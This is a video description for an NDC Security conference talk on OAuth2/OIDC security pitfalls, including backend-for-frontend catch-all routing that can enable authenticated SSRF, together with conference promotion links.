This talk was recorded at NDC Security in Oslo, Norway. #ndcsecurity #ndcconferences #security #developer #softwaredeveloper

Attend the next NDC conference near you:
https://ndcconferences.com
https://ndc-security.com/

Subscribe to our YouTube channel and learn every day:
/@NDC

Follow our Social Media!

  / ndcconferences  
  / ndc_conferences  
  / ndc_conferences  


Best current practices (BCPs) for implementing OAuth2 and OIDC have undergone many changes over the years. While following the BCPs it’s still easy to make mistakes and you might end up with a weak or even broken implementation.

Based on our experiences performing penetration tests and security reviews, this presentation will show common OAuth2/OIDC security weaknesses and pitfalls.

In particular concerning the BFF-pattern and why it is bad practice to use reverse proxy catch-all routing, an OAuth2 client with access to many scopes, together with APIs that do authorization based on just a valid token and scopes. Does your BFF enable authenticated SSRF as a Service?

During the presentation, we will demonstrate both attacks and defences for an OAuth2/OIDC application running locally.